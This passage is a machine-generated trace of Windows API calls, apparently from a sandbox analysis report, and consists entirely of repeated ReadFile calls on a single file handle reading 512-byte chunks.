nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, 
lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile 
(in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 
[0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, 
lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, 
lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: 
lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, 
lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, 
lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile 
(in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, 